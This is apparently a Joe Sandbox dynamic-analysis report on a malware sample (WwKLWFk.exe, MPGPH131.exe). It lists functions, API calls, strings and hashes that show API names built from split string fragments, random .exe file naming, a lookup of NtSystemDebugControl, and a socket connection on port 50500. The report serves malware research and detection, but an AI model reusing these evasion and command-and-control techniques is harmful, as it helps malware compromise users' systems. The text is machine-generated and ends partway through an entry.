Instruction ID: 999709632ba0b489a3c121b5238390733419168a2158949d703403d977f992de
Opcode Fuzzy Hash: c9b01733abf4b5b4851a23d749863c6ce3f13afbc2ae237e0882cd8b0431d761
Instruction Fuzzy Hash: C7E09277A00218BBDB00A7A9FC4A8DEBBECDE88161B100566F600D3250E970E9448AB4

Function 00212692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,002129DB,?,00000001), ref: 002126A7
WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,002129DB,?,00000001), ref: 002126B5
lstrlen.KERNEL32(?), ref: 002126C4
??2@YAPAXI@Z.MSVCRT ref: 002126CE
lstrcpy.KERNEL32(00000004,?), ref: 002126E3
lstrcpy.KERNEL32(?,00000004), ref: 0021271F
??3@YAXPAX@Z.MSVCRT ref: 0021272D
SetEvent.KERNEL32 ref: 0021273C

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: ac59e71c9825ba68f080e2e74f14cf4004628d1d03bcd2a670cabd8436ef82e9
Instruction ID: f14bca06f21ab9b9d27589058c86b392c04a120babd35caaafa476caf67185b3
Opcode Fuzzy Hash: ac59e71c9825ba68f080e2e74f14cf4004628d1d03bcd2a670cabd8436ef82e9
Instruction Fuzzy Hash: A1116A35510100EFCB21EF14FD4C8DBBBEAFBB87207248026F458C7160DA7089AACB90

Function 00211B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00211BCD
rand.MSVCRT ref: 00211BD8
memset.MSVCRT ref: 00211C43
memcpy.MSVCRT ref: 00211C4F
lstrcat.KERNEL32(?,.exe), ref: 00211C5D

Strings

HYkwRHdLBANDYCtoGcRKEpkAOeWayQoGcdBhktQgOJpeKnQmSqMSCGuVWeMPbmgPFXqTWJnIyPswMUnXpHzbisIxmwyYicdiILBhbVajzNvXlrZfERxFLANffEKrrqTDTDgzJvuoZhavCsFUVtlSlOjuUjZx, xrefs: 00211B8A, 00211B9C, 00211C15, 00211C49
.exe, xrefs: 00211C57

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$HYkwRHdLBANDYCtoGcRKEpkAOeWayQoGcdBhktQgOJpeKnQmSqMSCGuVWeMPbmgPFXqTWJnIyPswMUnXpHzbisIxmwyYicdiILBhbVajzNvXlrZfERxFLANffEKrrqTDTDgzJvuoZhavCsFUVtlSlOjuUjZx
API String ID: 122620767-1533845309
Opcode ID: fa12bf020bb9a5b569e84c2ca25436c0a1a2a173fa34fc76a52b51a9e1ed678c
Instruction ID: 567083f5879dae93a4a7ca5a84f370839132aedde28fa13897828b1d96321667
Opcode Fuzzy Hash: fa12bf020bb9a5b569e84c2ca25436c0a1a2a173fa34fc76a52b51a9e1ed678c
Instruction Fuzzy Hash: 5821BE22E281906ED72523347C45BE93FC5CFB7714F2A809BF6894B1D2D5740AF582A4

Function 00211319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00211334
GetProcAddress.KERNEL32(00000000), ref: 0021133B
memset.MSVCRT ref: 00211359

Strings

ntdll.dll, xrefs: 0021132F
NtSystemDebugControl, xrefs: 0021132A

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 49fec680563984ab180af3583de8b798e3583becc6f547b685e43abaae4a5203
Instruction ID: 2044173a230741b41ee3b89e8a04756b4f62491d8a2568009c5a27a6a4a5044e
Opcode Fuzzy Hash: 49fec680563984ab180af3583de8b798e3583becc6f547b685e43abaae4a5203
Instruction Fuzzy Hash: C701617161030EBFDB10DF94AC899EFBBF8FB65314F00416AFA55A1144D67086A5CA91

Function 00211DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00211E0B
lstrcpy.KERNEL32(?,00000001), ref: 00211E1C
strrchr.MSVCRT ref: 00211E2B
lstrcmpiA.KERNEL32(?,00214488), ref: 00211E48
lstrlen.KERNEL32(00214488), ref: 00211E53

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: f9b853b6398b57d8b9d351cdacac6ac6fbc75ee7eb3f8e36940904f135a03090
Instruction ID: 0af37af5019c31ba967def36e628d7a6248fd74e7964ebaecff91025a982ad56
Opcode Fuzzy Hash: f9b853b6398b57d8b9d351cdacac6ac6fbc75ee7eb3f8e36940904f135a03090
Instruction Fuzzy Hash: 1F01FE729142166FEB109BA0FC4DBD67BDDDB24310F044065DB45D3091EE749AD4CBD0

Function 00216014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0021603C
GetProcAddress.KERNEL32(00000000,00216064), ref: 0021604F

Strings

kernel32.dll, xrefs: 0021603B

Memory Dump Source

Source File: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 9165358f50379daa0da7c28a0e4ac7227fdb079b12b920ca49df750f3e12789a
Instruction ID: 99d73123e93940b7cb86df75ef7e989c5c8560841c49c52959ca16207a41982a
Opcode Fuzzy Hash: 9165358f50379daa0da7c28a0e4ac7227fdb079b12b920ca49df750f3e12789a
Instruction Fuzzy Hash: C9F0F6B114028A8FDF708E64CC48BDE37E4EB25700F50042AEA09CB641CB348695CB14

Analysis Process: MPGPH131.exePID: 8104, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	0%
Total number of Nodes:	245
Total number of Limit Nodes:	40

Executed Functions

Function 008B1044 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 008B1223

Strings

odul, xrefs: 008B122D
Clos, xrefs: 008B1129
Crea, xrefs: 008B1169
Writ, xrefs: 008B1148
el32, xrefs: 008B10FB
lstr, xrefs: 008B11A7
dleA, xrefs: 008B10D0
WwKLWFk.exe, xrefs: 008B11FD, 008B1200
GetM, xrefs: 008B10B6
WinE, xrefs: 008B1110
athA, xrefs: 008B1199
Kern, xrefs: 008B10F4
.dll, xrefs: 008B1102
GetT, xrefs: 008B1188
catA, xrefs: 008B11AF

Memory Dump Source

Source File: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 823142352-1035807574
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: c96851f0987c8afbc2e98fb2e1eb046562e801de2c9ffb537dba27b6c6383483
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 25612975D01219DBCF24CF98C8A8AEEF7B4FB44315FA4926AD605AB301C3309A81CB95

Function 0031DB60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0031DB8A
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0031DC2E
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0031DC42
closesocket.WS2_32(00000000), ref: 0031DC4D

Strings

50500, xrefs: 0031DBE8

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500
API String ID: 3098855095-2230786414
Opcode ID: b99e192898a687ce11528e54ec941f75a434ec1c958532d2f419b1cb274467b9
Instruction ID: 4167ef0984ae0e00558206a3d3dbeb497006ade010d0d806257f688a6b31858a
Opcode Fuzzy Hash: b99e192898a687ce11528e54ec941f75a434ec1c958532d2f419b1cb274467b9
Instruction Fuzzy Hash: 8E31F5725053106BC7218B288C85B6FB7E5FFCA734F111F1DF8A8A32D0D370A8448692

Function 04E90687 Relevance: 1.8, APIs: 1, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee789b2ec167919f1ce34b461fb767f726fc8221a2fcfcd267a8daa7b0774ef
Instruction ID: 89878d53c0fc5e7e2803b0a7e200ebd9064ba91069b5fa2abe690dbb0d07913a
Opcode Fuzzy Hash: 5ee789b2ec167919f1ce34b461fb767f726fc8221a2fcfcd267a8daa7b0774ef
Instruction Fuzzy Hash: 055115EB30D210BDFA5286411B50AFA27EDE7D67307B0A42AF407D56C2F3A42E8575B1

Function 04E9065C Relevance: 1.8, APIs: 1, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6691a2275afe0b8b1b46ebbf7ac8a8fef5ac75679652ee2bc0343ff7e50ed6fd
Instruction ID: 06fe5bf3c1df11daea689dfa85fc57e54e394ade2bddb2f79e9e0d2fb6c809d3
Opcode Fuzzy Hash: 6691a2275afe0b8b1b46ebbf7ac8a8fef5ac75679652ee2bc0343ff7e50ed6fd
Instruction Fuzzy Hash: 6951E3EB30C210FDFA5296451B50AF626EDE7C67307B0A42AF807D56C2F3942E893471

Function 04E90640 Relevance: 1.8, APIs: 1, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: b60567bbe3f2dd6d85c5b9db40a36f6c39496e1f07fa19599529167ae3240d81
Instruction ID: 7be84b3c96bd696fcaa127f4851b646d5661531f98304d75e69cd1a68f95edfe
Opcode Fuzzy Hash: b60567bbe3f2dd6d85c5b9db40a36f6c39496e1f07fa19599529167ae3240d81
Instruction Fuzzy Hash: 7B51D3EB30C124FDFA5296451B50AFA66EDE7C67307B0A42AF807D56C2F3942E893471

Function 04E90634 Relevance: 1.8, APIs: 1, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 8649347fd4fde5dbb01c3b10c65f7b181228a5ec7c843379f1cf861adb42353b
Instruction ID: e94ade1979274766142dbd138357969fa3bbb64e1f20832145a3f5dbc9ad219f
Opcode Fuzzy Hash: 8649347fd4fde5dbb01c3b10c65f7b181228a5ec7c843379f1cf861adb42353b
Instruction Fuzzy Hash: 0751C1EB30C120FDF95286451B50AFA16EDE7D67307B0A42AB807D56C2F3942E893471

Function 04E9067B Relevance: 1.8, APIs: 1, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a643ab42f3a47e964d5a043c54092beae38aafde1e88c6919dd20026b029b6f8
Instruction ID: 51619bff1338e7f866a7a0855c3f5a43a63526ee39fe0fd6da39830f81b92d27
Opcode Fuzzy Hash: a643ab42f3a47e964d5a043c54092beae38aafde1e88c6919dd20026b029b6f8
Instruction Fuzzy Hash: 9251D1EB30C124FDFD5282461B50AF616EDE7C67307B0A42AB807D56C2F3942E8974B2

Function 04E90731 Relevance: 1.8, APIs: 1, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 588ab3d8b3c91a234c80808be270600c47943aa9c826618762565cad9ed46d52
Instruction ID: 7783f09c14c47e51fbefe7598e5bda441e5f2923321289896f2400c145b279b3
Opcode Fuzzy Hash: 588ab3d8b3c91a234c80808be270600c47943aa9c826618762565cad9ed46d52
Instruction Fuzzy Hash: AD51B1EB30D114BDFA5286452B50AFA56EDE7C67307B0A426F807D5682F3D42E8934B1

Function 04E906C3 Relevance: 1.8, APIs: 1, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 8c623bbcafb6fba3dafc9dbb2aa67837de48b976123100002bb957dfa34ab7a4
Instruction ID: aa9ba1a81c60f7b085790ff33a2d1c763abd59d54287977369aaee177d5d7af0
Opcode Fuzzy Hash: 8c623bbcafb6fba3dafc9dbb2aa67837de48b976123100002bb957dfa34ab7a4
Instruction Fuzzy Hash: 6A5103EB70C124BDFA5286451B50AFA16EDE7C67307B0A02AF807D56C2F3D42E8934B1

Function 04E906F5 Relevance: 1.8, APIs: 1, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: be6e10470f48d89a1d7e39412e0440c58a7bb20530a32cc5d60120d6cbe81d47
Instruction ID: 703db38718311250d35739564ee01adb6d2965e37308a12817c47f1448f50902
Opcode Fuzzy Hash: be6e10470f48d89a1d7e39412e0440c58a7bb20530a32cc5d60120d6cbe81d47
Instruction Fuzzy Hash: 0A51D1EB30C110ADFA5696452B50AFA57EDE7C67307B0A02AF807D56C2F3D42E8974B1

Function 04E90758 Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 43f7f8bc76490adb782554ed250e8d821bc0198e49f868b1f9ed15f65e45cea0
Instruction ID: ca94780ad74effdbe6523f4ffcb1661224b00799652d6ef31353e1059fbfda48
Opcode Fuzzy Hash: 43f7f8bc76490adb782554ed250e8d821bc0198e49f868b1f9ed15f65e45cea0
Instruction Fuzzy Hash: CC51D0EB70C114BDFE5296462B50AFA16EDE7C67307B0A426F807D56C2F3942E8934B1

Function 04E90715 Relevance: 1.8, APIs: 1, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4f5e464b853c251c0727194962dc3842f39a68753e9d7d9b1ecad3ced810fe01
Instruction ID: f50864d812b6285f9d37672a2e8721f7e81c5d3311cdf7751d040f204d7a32ec
Opcode Fuzzy Hash: 4f5e464b853c251c0727194962dc3842f39a68753e9d7d9b1ecad3ced810fe01
Instruction Fuzzy Hash: 9251C1EB70C110BDFE5296452B50AFA16EDE7C67307B0A426F807D5682F3942E8574B1

Function 04E90744 Relevance: 1.7, APIs: 1, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 368fa7fa55cb9bbeb4cf2908d64babca9500520f01c357d95c2eeca9fe6062df
Instruction ID: b66b0f7e181e6d87052eee90793a03fecc0c4d1fca6339c5af265a9fdd211af6
Opcode Fuzzy Hash: 368fa7fa55cb9bbeb4cf2908d64babca9500520f01c357d95c2eeca9fe6062df
Instruction Fuzzy Hash: 3F41D0EB30D124BDFE6286461B50AF616EDE7C67307B0A026B807D56C2F3D42E8974B1

Function 04E90777 Relevance: 1.7, APIs: 1, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 55c4339ec897fd5454d41b2b069727ec980ad0cba46df25c019209376e46ce9d
Instruction ID: 091660d6224590b8b4f691ebef58cade3bd04a56ac7134a4dbf363a547e79c5d
Opcode Fuzzy Hash: 55c4339ec897fd5454d41b2b069727ec980ad0cba46df25c019209376e46ce9d
Instruction Fuzzy Hash: 0E41D0EB30D120BDF96286461B50AF656EDE7C67307B0A426B807D5682F2D42E8570B1

Function 04E9079F Relevance: 1.7, APIs: 1, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 5c6514d5811ae0154f956395707eac1c79f60b62c5a49c1bc05430a6c3391f46
Instruction ID: 72f6fe7e6581add06586eb49b72ab1987d142bb3e43d99f01e65c26316f71e8b
Opcode Fuzzy Hash: 5c6514d5811ae0154f956395707eac1c79f60b62c5a49c1bc05430a6c3391f46
Instruction Fuzzy Hash: C341E3BB70C110ADFA6286451B50AF666EDE7C67307B0A42AF807D56C1F3D42E8570B1

Function 04E9078C Relevance: 1.7, APIs: 1, Instructions: 217COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 7a5f06da91f6c7977eb8edce1bd12c774fcb457aaaa9408ea2fb58b72a6c0712
Instruction ID: d188a7cf590c39b104d29e259ed0fcdceb82b14a88626b109b690fc535234f3f
Opcode Fuzzy Hash: 7a5f06da91f6c7977eb8edce1bd12c774fcb457aaaa9408ea2fb58b72a6c0712
Instruction Fuzzy Hash: F841E3EB70C124ADFD6286461B50AFA56EDE7C67307B0A026B807D56C2F3D42E8530B1

Function 04E907B9 Relevance: 1.7, APIs: 1, Instructions: 205COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 10b8e818aabde4f2e7b0f6d217096043745b25c0dea7e77ddd67d7e3cf53a1e0
Instruction ID: b418c4c9035589db65b696b581fa3d16dfd5f37f0ec2b8def9e2bf5b3cf5eca4
Opcode Fuzzy Hash: 10b8e818aabde4f2e7b0f6d217096043745b25c0dea7e77ddd67d7e3cf53a1e0
Instruction Fuzzy Hash: 8B4101EB30D124ADFD6286451B50AFA56EDE7C67307B0A02AF907D52C2F3D42E8930B1

Function 04E907E3 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E9089B

Memory Dump Source

Source File: 0000000E.00000002.3743892029.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4e90000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 96702f3a397a60a8ab80a1081b9f0b016509231ba5b45aabbe1f66d067a66eb9
Instruction ID: fe2c8f9c7a1076f3190ea19745cbba598ba69b0806a0f2d7937340800f738088
Opcode Fuzzy Hash: 96702f3a397a60a8ab80a1081b9f0b016509231ba5b45aabbe1f66d067a66eb9
